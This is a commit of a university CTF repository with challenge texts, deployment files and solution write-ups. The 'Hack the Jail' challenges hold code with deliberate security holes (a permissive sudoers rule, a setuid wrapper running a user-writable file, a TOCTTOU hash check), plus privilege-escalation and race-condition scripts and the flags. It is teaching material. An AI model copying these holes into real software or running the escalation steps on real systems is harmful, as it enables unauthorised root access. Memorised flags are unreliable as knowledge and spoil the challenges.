initial commit

This commit is contained in:
Robbe De Greef 2022-11-24 22:59:22 +01:00
commit 0ac8165900
265 changed files with 20281 additions and 0 deletions

5
README.md Normal file
View File

@ -0,0 +1,5 @@
# IGCTF writeups 2022-2023
You can find all the challenges here in these folders. Each challenge folder *should* contain a `SOLUTION.md` that contains a (possible) solution for the challenge.
Have fun!

View File

@ -0,0 +1,9 @@
CONCRETELY:
scp -r src debian@51.210.158.3:/home/debian
ssh debian@51.210.158.3
sudo mv src/* /
sudo apt update -y && sudo apt install -y lib32z1 xinetd docker-compose.plugin
chmod +x /start.sh
chmod +x /run.sh
sudo mv /ctf.xinetd /etc/xinetd.d/ctf
sudo systemctl restart xinetd

View File

@ -0,0 +1,12 @@
# Break From Jail
**This challenge is a work in progress**
This challenge consists of three parts.
This README file contains the generic information for all three parts (how to deploy).
The text is different for each of the levels.
## How to Deploy
Docker image should be deployed using xinetd, so that each tcp connection to the deployed port creates a new instance of the docker container, the command that should be run by xinetd is in `start.sh`.

View File

@ -0,0 +1,28 @@
# Hack the Jail - Part 1
## Text
We somehow got access to this remote system
**INSERT REMOTE IP + PORT HERE**, but we only managed to get access to the "ig" user.
Your task is to get root access and read the flag.
Connect using:
```bash
nc INSERT REMOTE IP + PORT HERE
```
## Extra hints if no solves
* Make me a sandwhich.
(almost gives it away)
* They keep saying I should use visudo, but I don't want to use Vi!
## Files
None
## How to deploy
As described in parent README.

View File

@ -0,0 +1,29 @@
# Hack the Jail - Part 1
## Difficulty
Very easy, but the participant needs to know about "sudo", which might be unknown for Linux novices.
## How To Solve
![](https://imgs.xkcd.com/comics/sandwich.png)
If something says "permission denied" on Linux, try with `sudo`. In this case the `/etc/sudoers` file seems to contain a peculiar line related to the currently executing user `ig`. It states the following:
```
ig ALL = NOPASSWD: /bin/cat
```
This means that the `ig` user is allowed to execute the `/bin/cat` binary with elavated permissions without using a password.
Therefore executing:
```
sudo cat /flag.txt
```
reveals the flag.
## Flag
IGCTF{ASimpleVisudoCanDoGreatDamage1}

View File

@ -0,0 +1,20 @@
service ctf
{
disable = no
socket_type = stream
protocol = tcp
wait = no
user = root
type = UNLISTED
port = 3000
bind = 0.0.0.0
server = /home/debian/src/run.sh
banner_fail = /etc/banner_fail
# safety options
per_source = 10 # the maximum instances of this service per source IP address
rlimit_cpu = 1 # the maximum number of CPU seconds that the service may use
#rlimit_as = 1024M # the Address Space resource limit for the service
log_type = SYSLOG authpriv
log_on_success = HOST PID
log_on_failure = HOST
}

View File

@ -0,0 +1,3 @@
#!/bin/bash
docker run --rm -i challenge

View File

@ -0,0 +1,13 @@
FROM alpine
RUN adduser -D -H ig && mkdir /home/ig && chown -R ig:ig /home/ig
RUN apk update && \
apk add sudo busybox
COPY sudoers /etc/sudoers
COPY flag.txt /flag.txt
RUN chmod 400 /flag.txt
USER ig
CMD ["busybox", "sh"]

View File

@ -0,0 +1 @@
IGCTF{ASimpleVisudoCanDoGreatDamage1}

View File

@ -0,0 +1 @@
ig ALL = NOPASSWD: /bin/cat

View File

@ -0,0 +1,4 @@
#!/bin/sh
/etc/init.d/xinetd start;
sleep infinity;

View File

@ -0,0 +1,15 @@
# Hack the Jail - Part 2
## Text
The saga continues... We got access to another system but the previous hack does not seem to work anymore.
The compromised user `ig` has two executable files in its home directory, `execute` and `hello_world`, strangely the former is owned by root...
## Files
* bin/execute
* bin/hello_world
## How to deploy
See README of the parent.

View File

@ -0,0 +1,114 @@
# Hack the Jail - Part 2
## Difficulty
Moderate - the participant needs to know about the `setuid` bit, and needs to reverse engineer the binary using a tool such as Ghidra to gain more insight.
## How To Solve
### Connecting to the challenge
When connecting to the challenge's IP and port we get access to a shell running as the `ig` user.
```
bash5.1$ whoami
ig
```
The flag is still on `/flag.txt`, trying to read it results in a permission denied error as the file is only readable by `root`.
```
bash-5.1$ cat /flag.txt
cat: can't open '/flag.txt': Permission denied
```
Unfortunately, our luck of last time has run out, a simple `sudo cat /flag.txt` does not seem to work anymore.
In fact, `sudo` is not even installed. Let's move on to see what is inside of our home directory.
We notice that it contains two files (which were listed on the CTF platform in binary format as well):
* execute: a binary that is owned by root and has the following permissions: -rwsr-sr-x
* hello_world: a binary owned by the IG user that has the following permissions: -rwxr-xr-x
Comparing the two types of permissions, we notice that the `execute` binary has a special permission called `s`.
This indicates that the binary has the `setuid` capability, which means that it is able to change the user it is running as **during its execution**. We will come back to this later, as we will first reverse engineer both binaries.
### Reverse Engineering the Binaries
#### Hello World
Importing the `hello_world` program into Ghidra reveals that it indeed is a simple `hello_world` program:
```
undefined8 main(void)
{
puts("Hello World");
return 0;
}
```
Nothing to see here.
##### The "execute" program
The `execute` program is far more interesting:
```
undefined8 main(void)
{
long in_FS_OFFSET;
char *local_20;
char *local_18;
long local_10;
local_10 = *(long *)(in_FS_OFFSET + 0x28);
local_20 = (char *)0x0;
local_18 = (char *)0x0;
setuid(0);
execve("./hello_world",&local_20,&local_18);
puts("Could not execute program");
perror("execve");
if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return 0;
}
```
Ignoring all memory allocations on top of the `main` function, we notice that the program first ensures that it is running as root. It can accomplish this by changing the user id it is running as using the `setuid` function. Typically, the user id `0` corresponds to the `root` or `superuser` of the system.
Note that this call would fail if the `setuid` capability bit was not set, because the `ig` user does not have permission to change the running user to `root`.
After it has changed the user it is running as, it replaces itself with the `hello_world` binary using the `execve` function.
## The Attack
Since the `hello_world` binary is owned by the `ig` user, we also have permission to change it.
Here we could change it to something that is able to read the `/flag.txt` file (using a bash script or another compiled C program). However, the easiest solution is to replace the binary with a shell, such that we can obtain a shell as the `root` user.
```
$ rm hello_world
$ ln -s /bin/bash hello_world
```
Running `execute` again results in a `root` shell!
```
bash5.1$ ./execute
bash5.1$ whoami
root
bash5.1$ cat /flag.txt
IGCTF{S3tUid?B3C4refulWith1t!}
```
## Flag
IGCTF{S3tUid?B3C4refulWith1t!}

View File

@ -0,0 +1,20 @@
service ctf
{
disable = no
socket_type = stream
protocol = tcp
wait = no
user = root
type = UNLISTED
port = 3000
bind = 0.0.0.0
server = /home/debian/src/run.sh
banner_fail = /etc/banner_fail
# safety options
per_source = 10 # the maximum instances of this service per source IP address
rlimit_cpu = 1 # the maximum number of CPU seconds that the service may use
#rlimit_as = 1024M # the Address Space resource limit for the service
log_type = SYSLOG authpriv
log_on_success = HOST PID
log_on_failure = HOST
}

View File

@ -0,0 +1,3 @@
#!/bin/bash
docker run --rm -i challenge

View File

@ -0,0 +1,25 @@
FROM alpine
RUN adduser -D -H ig && mkdir /home/ig && chown -R ig:ig /home/ig
RUN apk --no-cache add bash gcc musl-dev
COPY src/ /src
WORKDIR /src
RUN gcc hello_world.c -o /home/ig/hello_world && \
gcc execute.c -o /home/ig/execute
# Now set the evil setuid bits
RUN chmod +s /home/ig/execute
RUN chown ig:ig /home/ig/hello_world
WORKDIR /home/ig
RUN apk del gcc musl-dev && \
rm -rf /src
COPY flag.txt /flag.txt
RUN chmod 0400 /flag.txt
USER ig
CMD ["bash"]

Binary file not shown.

Binary file not shown.

View File

@ -0,0 +1 @@
IGCTF{S3tUid?B3C4refulWith1t!}

View File

@ -0,0 +1,15 @@
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
int main(int argc, char **argv) {
char *newargv[] = {NULL};
char *newenv[] = {NULL};
setuid(0);
int i = execve("./hello_world", newargv, newenv);
printf("Could not execute program\n");
perror("execve");
return EXIT_SUCCESS;
}

View File

@ -0,0 +1,7 @@
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char** argv) {
printf("Hello World\n");
return EXIT_SUCCESS;
}

View File

@ -0,0 +1,4 @@
#!/bin/sh
/etc/init.d/xinetd start;
sleep infinity;

View File

@ -0,0 +1,15 @@
# Hack the Jail - Part 2
## Text
The sysadmins have caught up with us, the files are the same but the previous attack won't work anymore.
Can you figure out why and gain us access once again?
## Files
* bin/execute
* bin/hello_world.sh
## How to deploy
See README of the parent.

View File

@ -0,0 +1,43 @@
# Hack the Jail - Part 2
## Difficulty
Hard.
## How To solve
The key insight of this challenge is that the file is opened twice: once for checking whether
the MD5sum matches the expected value, and the second time for actually executing the file.
This type of vulnerabity is called a "Time-of-check to time-of-use" or in short a TOCTTOU attack.
The challenge contains an artificially long timeout to be able to exploit this vulnerabity more easily.
The script below performs the actual attack:
```bash
#!/bin/bash
# run the vulnerable program in the backgrouncd
./execute &
# make sure that the check has been performed
sleep 1
# then replace the program with our malicious program
mv hello_world.sh hello_world.sh.old
cp read.sh hello_world.sh
# wait until the "execute" program has finished.
sleep 8
# clean up
rm hello_world.sh
mv hello_world.sh.old hello_world.sh
```
The contents of the `read.sh` file are as follows:
```
#!/bin/bash
cat /flag.txt
```
Both files need to have executable permissions which can be obtained using `chmod +x *.sh`.

View File

@ -0,0 +1,20 @@
service ctf
{
disable = no
socket_type = stream
protocol = tcp
wait = no
user = root
type = UNLISTED
port = 3000
bind = 0.0.0.0
server = /home/debian/src/run.sh
banner_fail = /etc/banner_fail
# safety options
per_source = 10 # the maximum instances of this service per source IP address
rlimit_cpu = 1 # the maximum number of CPU seconds that the service may use
#rlimit_as = 1024M # the Address Space resource limit for the service
log_type = SYSLOG authpriv
log_on_success = HOST PID
log_on_failure = HOST
}

View File

@ -0,0 +1,3 @@
#!/bin/bash
docker run --rm -i challenge

View File

@ -0,0 +1,26 @@
FROM alpine
RUN adduser -D -H ig && mkdir /home/ig && chown -R ig:ig /home/ig
RUN apk --no-cache add bash gcc musl-dev openssl openssl-dev nano
COPY src/ /src
WORKDIR /src
RUN gcc execute.c -o /home/ig/execute -lssl -lcrypto
RUN cp hello_world.sh /home/ig/hello_world.sh
# Now set the evil setuid bits
RUN chown ig:ig /home/ig/hello_world.sh
WORKDIR /home/ig
RUN apk del gcc musl-dev && \
rm -rf /src
COPY flag.txt /flag.txt
RUN chmod 0400 /flag.txt
RUN chmod 745 /home/ig/execute
RUN chmod +s /home/ig/execute
USER ig
CMD ["bash"]

View File

@ -0,0 +1,49 @@
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <openssl/md5.h>
int check_hash(char* filename, char* correct_hash) {
unsigned char h[MD5_DIGEST_LENGTH];
FILE *inFile = fopen(filename, "rb");
MD5_CTX mdContext;
int bytes;
unsigned char data[1024];
if (inFile == NULL) {
return 0;
}
MD5_Init(&mdContext);
while ((bytes = fread(data, 1, 1024, inFile)) != 0)
MD5_Update(&mdContext, data, bytes);
MD5_Final(h, &mdContext);
char final_cmp[MD5_DIGEST_LENGTH * 2];
char *p = final_cmp;
for(int i = 0; i < MD5_DIGEST_LENGTH; i++) {
sprintf(p, "%02x", h[i]);
p = p + 2;
}
return strcmp(correct_hash, final_cmp) == 0;
}
int main() {
char filename[] = "hello_world.sh";
char correct_hash[] = "aa42f09c74acc950e59fb909d03d32f2";
if (check_hash(filename, correct_hash)) {
char* newargv[] = {NULL};
char* newenv[] = {NULL};
sleep(3);
setuid(0);
int i = execve("./hello_world.sh", newargv, newenv);
printf("could not execute program\n");
perror("execve");
return EXIT_SUCCESS;
} else {
printf("Invalid hash, will not execute");
}
}

View File

@ -0,0 +1,3 @@
#!/bin/bash
echo "Hello World"

View File

@ -0,0 +1 @@
IGCTF{Th0s3N4styT1mingAttackWillK1llM3}

View File

@ -0,0 +1,49 @@
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <openssl/md5.h>
int check_hash(char* filename, char* correct_hash) {
unsigned char h[MD5_DIGEST_LENGTH];
FILE *inFile = fopen(filename, "rb");
MD5_CTX mdContext;
int bytes;
unsigned char data[1024];
if (inFile == NULL) {
return 0;
}
MD5_Init(&mdContext);
while ((bytes = fread(data, 1, 1024, inFile)) != 0)
MD5_Update(&mdContext, data, bytes);
MD5_Final(h, &mdContext);
char final_cmp[MD5_DIGEST_LENGTH * 2];
char *p = final_cmp;
for(int i = 0; i < MD5_DIGEST_LENGTH; i++) {
sprintf(p, "%02x", h[i]);
p = p + 2;
}
return strcmp(correct_hash, final_cmp) == 0;
}
int main() {
char filename[] = "hello_world.sh";
char correct_hash[] = "aa42f09c74acc950e59fb909d03d32f2";
if (check_hash(filename, correct_hash)) {
char* newargv[] = {NULL};
char* newenv[] = {NULL};
sleep(3);
setuid(0);
int i = execve("./hello_world.sh", newargv, newenv);
printf("could not execute program\n");
perror("execve");
return EXIT_SUCCESS;
} else {
printf("Invalid hash, will not execute");
}
}

View File

@ -0,0 +1,3 @@
#!/bin/bash
echo "Hello World"

Binary file not shown.

Binary file not shown.

View File

@ -0,0 +1,4 @@
#!/bin/sh
/etc/init.d/xinetd start;
sleep infinity;

7
cool_capybara/README.md Normal file
View File

@ -0,0 +1,7 @@
# Cool Capybara
## Text
I like capybara's. They're cute. Do you know what a capybara is? In case you don't, I have included a file with some information and a nice little picture :)
## Files
The Capybara.pdf
## How to Deploy
N/A

View File

@ -0,0 +1,6 @@
## Difficulty
Easy - it's simply some hidden binary.
## How To Solve
Underneath the Capybara ASCII art, I've added some extra lines of symbols. If you replace the ⠾ by a 0 and the ⢿ by a 1, you will get the flag in binary.
## Flag
IGCTF{!araBypaC}

Binary file not shown.

Binary file not shown.

View File

@ -0,0 +1,5 @@
# Revision history for corrupted-encryption
## 0.1.0.0 -- YYYY-mm-dd
* First version. Released on an unsuspecting world.

View File

@ -0,0 +1,16 @@
# Corrupted Encryption
## Text
I'm not much for this competitive hacking, so if I could I would have just given you the flag for this challenge. The problem is that the file on which I kept the flag was encrypted, but because of some syncing issues with my cloud, the encryption key got lost and the file can no longer be decrypted. Luckily I backed up the encryption key... but that backup is situated in the file itself...
The best course of action you can take now is to maybe figure out what the file type was and to go from there...
Oh, also, yes stupid me added an additional layer of encoding for the flag so you'll have to break through that too :)
Notice: There is a secret second flag hidden somewhere :o
## Files
Participants get the `ctf flag (CONFLICTED COPY 2022-07-12)` provided, nothing else.
## How to Deploy
N/A

View File

@ -0,0 +1,11 @@
## Difficulty
Medium to hard. Users need to use a combination of forensics, encryption and encoding skills
## How To Solve
The file is a JPG image. Opening the JPG image reveals some information, in particular the encryption key, because the image is actually encrypted in the CBC encryption algorithm. CBC encrypts a file by partitioning it into blocks, and applying the key to each block using XOR. Since you have the file, and you have the key, as well as the partition length (being 8 pixels), you can xor the 2 hex values for the red, green and blue value of each of the 8 pixels (resulting in a hex number of length 48) with the encryption key (which is also a hex number of 48 characters long). Decrypting the image reveals the correct image, including the correct colors that were used to encode the flag with. These colors need to be converted to their hexidecimal values and be used as ascii values. Every color encodes 3 ascii characters.
The secret flag is just the encryption key. Converting it to ascii yields the secret flag
## Flag
Main flag: IGCTF{WhatYouJustDidIsCalledCBC!}
Secret flag: IGCTF{ThisTheSecretFlag}

View File

@ -0,0 +1,50 @@
module Main where
import Prelude as P
import Graphics.Image
import Graphics.Image.Interface as I
import Graphics.Image.ColorSpace as C
import Data.Bits
import Data.Strings
import Text.XML.HXT.DOM.Util
import Data.List.Split
segmentation = 8
seed = "49474354467B54686973546865536563726574466C61677D"
main :: IO ()
main = do
rawImage <- readImageRGB VU "./original_gimped.jpg"
let (width, height) = dims rawImage
let segmented = segment rawImage
let xorred = xorColor segmented
let newImage = segmentToImage xorred height
ret <- writeImage "./output.jpg" newImage
return ret
segment :: Image VU RGB Double -> [[Pixel RGB Double]]
segment image = reverse $ I.foldl
(\(head:tail) -> \val ->
if length head < segmentation
then (val:head):tail
else [val]:(reverse head):tail
) [[]] image
xorColor :: [[Pixel RGB Double]] -> [[Pixel RGB Double]]
xorColor segments = P.map (\pixels -> P.zipWith doXorring [0..] pixels) segments
doXorring :: Int -> Pixel RGB Double -> Pixel RGB Double
doXorring index pixel@(PixelRGB red green blue) =
let step = index * 6
seedPartRed = hexStringToInt $ strDrop(step) $ strTake(step + 2) seed
seedPartGreen = hexStringToInt $ strDrop(step + 2) $ strTake(step + 4) seed
seedPartBlue = hexStringToInt $ strDrop(step + 4) $ strTake(step + 4) seed
redHex = round $ red * 255 :: Int
greenHex = round $ green * 255 :: Int
blueHex = round $ blue * 255 :: Int
xorRed = (fromIntegral (redHex `xor` seedPartRed)) / 255
xorGreen = (fromIntegral (greenHex `xor` seedPartGreen)) / 255
xorBlue = (fromIntegral (blueHex `xor` seedPartBlue)) / 255
in PixelRGB xorRed xorGreen xorBlue
segmentToImage :: [[Pixel RGB Double]] -> Int -> Image VU RGB Double
segmentToImage segments width = fromLists (chunksOf width (concat segments))

View File

@ -0,0 +1,34 @@
cabal-version: 2.4
name: corrupted-encryption
version: 0.1.0.0
-- A short (one-line) description of the package.
-- synopsis:
-- A longer description of the package.
-- description:
-- A URL where users can report bugs.
-- bug-reports:
-- The license under which the package is released.
-- license:
author: Nicolas Mattelaer
maintainer: nmattela@infogroep.be
-- A copyright notice.
-- copyright:
-- category:
extra-source-files: CHANGELOG.md
executable corrupted-encryption
main-is: Main.hs
-- Modules included in this executable, other than Main.
-- other-modules:
-- LANGUAGE extensions used by modules in this package.
-- other-extensions:
build-depends: base ^>=4.15.1.0, hip, hxt, strings, split
hs-source-dirs: app
default-language: Haskell2010

Binary file not shown.

After

Width:  |  Height:  |  Size: 9.9 MiB

View File

@ -0,0 +1,51 @@
{-# LANGUAGE CPP #-}
{-# LANGUAGE NoRebindableSyntax #-}
{-# OPTIONS_GHC -fno-warn-missing-import-lists #-}
{-# OPTIONS_GHC -Wno-missing-safe-haskell-mode #-}
module Paths_corrupted_encryption (
version,
getBinDir, getLibDir, getDynLibDir, getDataDir, getLibexecDir,
getDataFileName, getSysconfDir
) where
import qualified Control.Exception as Exception
import Data.Version (Version(..))
import System.Environment (getEnv)
import Prelude
#if defined(VERSION_base)
#if MIN_VERSION_base(4,0,0)
catchIO :: IO a -> (Exception.IOException -> IO a) -> IO a
#else
catchIO :: IO a -> (Exception.Exception -> IO a) -> IO a
#endif
#else
catchIO :: IO a -> (Exception.IOException -> IO a) -> IO a
#endif
catchIO = Exception.catch
version :: Version
version = Version [0,1,0,0] []
bindir, libdir, dynlibdir, datadir, libexecdir, sysconfdir :: FilePath
bindir = "/home/nico/.cabal/bin"
libdir = "/home/nico/.cabal/lib/x86_64-linux-ghc-9.0.2/corrupted-encryption-0.1.0.0-inplace-corrupted-encryption"
dynlibdir = "/home/nico/.cabal/lib/x86_64-linux-ghc-9.0.2"
datadir = "/home/nico/.cabal/share/x86_64-linux-ghc-9.0.2/corrupted-encryption-0.1.0.0"
libexecdir = "/home/nico/.cabal/libexec/x86_64-linux-ghc-9.0.2/corrupted-encryption-0.1.0.0"
sysconfdir = "/home/nico/.cabal/etc"
getBinDir, getLibDir, getDynLibDir, getDataDir, getLibexecDir, getSysconfDir :: IO FilePath
getBinDir = catchIO (getEnv "corrupted_encryption_bindir") (\_ -> return bindir)
getLibDir = catchIO (getEnv "corrupted_encryption_libdir") (\_ -> return libdir)
getDynLibDir = catchIO (getEnv "corrupted_encryption_dynlibdir") (\_ -> return dynlibdir)
getDataDir = catchIO (getEnv "corrupted_encryption_datadir") (\_ -> return datadir)
getLibexecDir = catchIO (getEnv "corrupted_encryption_libexecdir") (\_ -> return libexecdir)
getSysconfDir = catchIO (getEnv "corrupted_encryption_sysconfdir") (\_ -> return sysconfdir)
getDataFileName :: FilePath -> IO FilePath
getDataFileName name = do
dir <- getDataDir
return (dir ++ "/" ++ name)

View File

@ -0,0 +1,160 @@
/* DO NOT EDIT: This file is automatically generated by Cabal */
/* package corrupted-encryption-0.1.0.0 */
#ifndef VERSION_corrupted_encryption
#define VERSION_corrupted_encryption "0.1.0.0"
#endif /* VERSION_corrupted_encryption */
#ifndef MIN_VERSION_corrupted_encryption
#define MIN_VERSION_corrupted_encryption(major1,major2,minor) (\
(major1) < 0 || \
(major1) == 0 && (major2) < 1 || \
(major1) == 0 && (major2) == 1 && (minor) <= 0)
#endif /* MIN_VERSION_corrupted_encryption */
/* package base-4.15.1.0 */
#ifndef VERSION_base
#define VERSION_base "4.15.1.0"
#endif /* VERSION_base */
#ifndef MIN_VERSION_base
#define MIN_VERSION_base(major1,major2,minor) (\
(major1) < 4 || \
(major1) == 4 && (major2) < 15 || \
(major1) == 4 && (major2) == 15 && (minor) <= 1)
#endif /* MIN_VERSION_base */
/* package hip-1.5.6.0 */
#ifndef VERSION_hip
#define VERSION_hip "1.5.6.0"
#endif /* VERSION_hip */
#ifndef MIN_VERSION_hip
#define MIN_VERSION_hip(major1,major2,minor) (\
(major1) < 1 || \
(major1) == 1 && (major2) < 5 || \
(major1) == 1 && (major2) == 5 && (minor) <= 6)
#endif /* MIN_VERSION_hip */
/* package hxt-9.3.1.22 */
#ifndef VERSION_hxt
#define VERSION_hxt "9.3.1.22"
#endif /* VERSION_hxt */
#ifndef MIN_VERSION_hxt
#define MIN_VERSION_hxt(major1,major2,minor) (\
(major1) < 9 || \
(major1) == 9 && (major2) < 3 || \
(major1) == 9 && (major2) == 3 && (minor) <= 1)
#endif /* MIN_VERSION_hxt */
/* package split-0.2.3.4 */
#ifndef VERSION_split
#define VERSION_split "0.2.3.4"
#endif /* VERSION_split */
#ifndef MIN_VERSION_split
#define MIN_VERSION_split(major1,major2,minor) (\
(major1) < 0 || \
(major1) == 0 && (major2) < 2 || \
(major1) == 0 && (major2) == 2 && (minor) <= 3)
#endif /* MIN_VERSION_split */
/* package strings-1.1 */
#ifndef VERSION_strings
#define VERSION_strings "1.1"
#endif /* VERSION_strings */
#ifndef MIN_VERSION_strings
#define MIN_VERSION_strings(major1,major2,minor) (\
(major1) < 1 || \
(major1) == 1 && (major2) < 1 || \
(major1) == 1 && (major2) == 1 && (minor) <= 0)
#endif /* MIN_VERSION_strings */
/* tool gcc-12.1.0 */
#ifndef TOOL_VERSION_gcc
#define TOOL_VERSION_gcc "12.1.0"
#endif /* TOOL_VERSION_gcc */
#ifndef MIN_TOOL_VERSION_gcc
#define MIN_TOOL_VERSION_gcc(major1,major2,minor) (\
(major1) < 12 || \
(major1) == 12 && (major2) < 1 || \
(major1) == 12 && (major2) == 1 && (minor) <= 0)
#endif /* MIN_TOOL_VERSION_gcc */
/* tool ghc-9.0.2 */
#ifndef TOOL_VERSION_ghc
#define TOOL_VERSION_ghc "9.0.2"
#endif /* TOOL_VERSION_ghc */
#ifndef MIN_TOOL_VERSION_ghc
#define MIN_TOOL_VERSION_ghc(major1,major2,minor) (\
(major1) < 9 || \
(major1) == 9 && (major2) < 0 || \
(major1) == 9 && (major2) == 0 && (minor) <= 2)
#endif /* MIN_TOOL_VERSION_ghc */
/* tool ghc-pkg-9.0.2 */
#ifndef TOOL_VERSION_ghc_pkg
#define TOOL_VERSION_ghc_pkg "9.0.2"
#endif /* TOOL_VERSION_ghc_pkg */
#ifndef MIN_TOOL_VERSION_ghc_pkg
#define MIN_TOOL_VERSION_ghc_pkg(major1,major2,minor) (\
(major1) < 9 || \
(major1) == 9 && (major2) < 0 || \
(major1) == 9 && (major2) == 0 && (minor) <= 2)
#endif /* MIN_TOOL_VERSION_ghc_pkg */
/* tool haddock-2.25.1 */
#ifndef TOOL_VERSION_haddock
#define TOOL_VERSION_haddock "2.25.1"
#endif /* TOOL_VERSION_haddock */
#ifndef MIN_TOOL_VERSION_haddock
#define MIN_TOOL_VERSION_haddock(major1,major2,minor) (\
(major1) < 2 || \
(major1) == 2 && (major2) < 25 || \
(major1) == 2 && (major2) == 25 && (minor) <= 1)
#endif /* MIN_TOOL_VERSION_haddock */
/* tool hpc-0.68 */
#ifndef TOOL_VERSION_hpc
#define TOOL_VERSION_hpc "0.68"
#endif /* TOOL_VERSION_hpc */
#ifndef MIN_TOOL_VERSION_hpc
#define MIN_TOOL_VERSION_hpc(major1,major2,minor) (\
(major1) < 0 || \
(major1) == 0 && (major2) < 68 || \
(major1) == 0 && (major2) == 68 && (minor) <= 0)
#endif /* MIN_TOOL_VERSION_hpc */
/* tool hsc2hs-0.68.7 */
#ifndef TOOL_VERSION_hsc2hs
#define TOOL_VERSION_hsc2hs "0.68.7"
#endif /* TOOL_VERSION_hsc2hs */
#ifndef MIN_TOOL_VERSION_hsc2hs
#define MIN_TOOL_VERSION_hsc2hs(major1,major2,minor) (\
(major1) < 0 || \
(major1) == 0 && (major2) < 68 || \
(major1) == 0 && (major2) == 68 && (minor) <= 7)
#endif /* MIN_TOOL_VERSION_hsc2hs */
/* tool pkg-config-1.8.0 */
#ifndef TOOL_VERSION_pkg_config
#define TOOL_VERSION_pkg_config "1.8.0"
#endif /* TOOL_VERSION_pkg_config */
#ifndef MIN_TOOL_VERSION_pkg_config
#define MIN_TOOL_VERSION_pkg_config(major1,major2,minor) (\
(major1) < 1 || \
(major1) == 1 && (major2) < 8 || \
(major1) == 1 && (major2) == 8 && (minor) <= 0)
#endif /* MIN_TOOL_VERSION_pkg_config */
/* tool runghc-9.0.2 */
#ifndef TOOL_VERSION_runghc
#define TOOL_VERSION_runghc "9.0.2"
#endif /* TOOL_VERSION_runghc */
#ifndef MIN_TOOL_VERSION_runghc
#define MIN_TOOL_VERSION_runghc(major1,major2,minor) (\
(major1) < 9 || \
(major1) == 9 && (major2) < 0 || \
(major1) == 9 && (major2) == 0 && (minor) <= 2)
#endif /* MIN_TOOL_VERSION_runghc */
/* tool strip-2.38 */
#ifndef TOOL_VERSION_strip
#define TOOL_VERSION_strip "2.38"
#endif /* TOOL_VERSION_strip */
#ifndef MIN_TOOL_VERSION_strip
#define MIN_TOOL_VERSION_strip(major1,major2,minor) (\
(major1) < 2 || \
(major1) == 2 && (major2) < 38 || \
(major1) == 2 && (major2) == 38 && (minor) <= 0)
#endif /* MIN_TOOL_VERSION_strip */
#ifndef CURRENT_COMPONENT_ID
#define CURRENT_COMPONENT_ID "corrupted-encryption-0.1.0.0-inplace-corrupted-encryption"
#endif /* CURRENT_COMPONENT_ID */
#ifndef CURRENT_PACKAGE_VERSION
#define CURRENT_PACKAGE_VERSION "0.1.0.0"
#endif /* CURRENT_PACKAGE_VERSION */

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

File diff suppressed because one or more lines are too long

Binary file not shown.

Binary file not shown.

Binary file not shown.

View File

@ -0,0 +1,6 @@
import Prelude as P
import Graphics.Image as I
image :: IO()
image = do
rawImage <- readImageExact JPG "./original.jpg"

BIN
corrupted-encryption/original.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 2.7 MiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 2.5 MiB

Binary file not shown.

Binary file not shown.

After

Width:  |  Height:  |  Size: 9.9 MiB

View File

@ -0,0 +1,16 @@
# Cybergrandma's cake recipe
## Text
*The year is 2077*
We were talking to our grandma about the awesome cake she used to make back
in the day when we were younger. She used to make it every christmas it was
*sooooo* good. However a couple years back she passed away, luckily modern
medicine were able to upload her into a computer. Since she can't make the
cake anymore (obviously), she sent us the recipe. I tried to make the cake
but I turned out awful. Can you figure out what is wrong with it?
## Files
cake.txt
## How to Deploy
n/a

View File

@ -0,0 +1,13 @@
## Difficulty
easy - 100/500 punten
(Je moet gewoon de Chef compiler vinden en de file runnen)
## How To Solve
The program is written in the Chef language. All you have to do is run
it with an interpreter like [this](https://github.com/booleancoercion/rchef) one
and the flag will roll right out.
Other possible interpreters: [java interpreter](https://github.com/joostrijneveld/Chef-Interpreter)
## Flag
IGCTF{tH3_c4K3_1S_a_L1E}

View File

@ -0,0 +1,100 @@
Tasty cake with chocolate sauce and sprinkles.
This tasty cake with chocolate sauce and sprinkles is a little
harder to make than regular cake or cake with icing,
but I think it is a lot better. The effort
really pays off in the end. Perfect as a dessert for your family :)
Ingredients.
70 g flour
67 g chocolate chips
2 eggs
80 ml beaten eggs
70 g butter
113 g yeast
70 g sugar
3 g baking soda
125 g cacao powder
120 ml hot water
0 g cake mixture
1 pinch salt
Method.
Put butter into mixing bowl.
Add eggs to mixing bowl.
Put yeast into mixing bowl.
Add baking soda to mixing bowl.
Put hot water into mixing bowl.
Add baking soda to mixing bowl.
Put sugar into mixing bowl.
Put beaten eggs into mixing bowl.
Add salt to mixing bowl.
Add baking soda to mixing bowl.
Put chocolate chips into mixing bowl.
Put butter into mixing bowl.
Add salt to mixing bowl.
Put flour into mixing bowl.
Add baking soda to mixing bowl.
Liquefy contents of the mixing bowl.
Liquefy contents of the mixing bowl.
Pour contents of the mixing bowl into the 1st baking dish.
Bake the cake mixture.
Wait until baked.
Serve with chocolate sauce.
Chocolate sauce.
Ingredients.
100 g cacao powder
95 g sugar
51 ml milk
1 pinch salt
75 g chocolate chips
2 pinches baking powder
12 g vanilla
pot
Method.
Clean mixing bowl.
Put sugar into mixing bowl.
Fold pot into mixing bowl.
Put pot into mixing bowl.
Put pot into mixing bowl.
Add baking powder to mixing bowl.
Put pot into mixing bowl.
Put sugar into mixing bowl.
Remove vanilla from mixing bowl.
Put milk into mixing bowl.
Remove baking powder from mixing bowl.
Put sugar into mixing bowl.
Put milk into mixing bowl.
Put chocolate chips into mixing bowl.
Put milk into mixing bowl.
Add salt to mixing bowl.
Put cacao powder into mixing bowl.
Remove salt from mixing bowl.
Put sugar into mixing bowl.
Put milk into mixing bowl.
Liquefy contents of the mixing bowl.
Pour contents of the mixing bowl into the 2nd baking dish.
Serve with sprinkles.
Sprinkles.
Ingredients.
76 g sugar
49 ml water
7 ml excess water
125 g brown sugar
Method.
Clean mixing bowl.
Put brown sugar into mixing bowl.
Put sugar into mixing bowl.
Remove excess water from mixing bowl.
Put water into mixing bowl.
Put sugar into mixing bowl.
Liquefy contents of the mixing bowl.
Pour contents of the mixing bowl into the 3rd baking dish.
Serves 3.

View File

@ -0,0 +1,18 @@
# Physical instructions
WARNING THIS FILE CONTAINS (a part of) THE SOLUTION TO THE CHALLENGE.
## Choose a location for the QR code
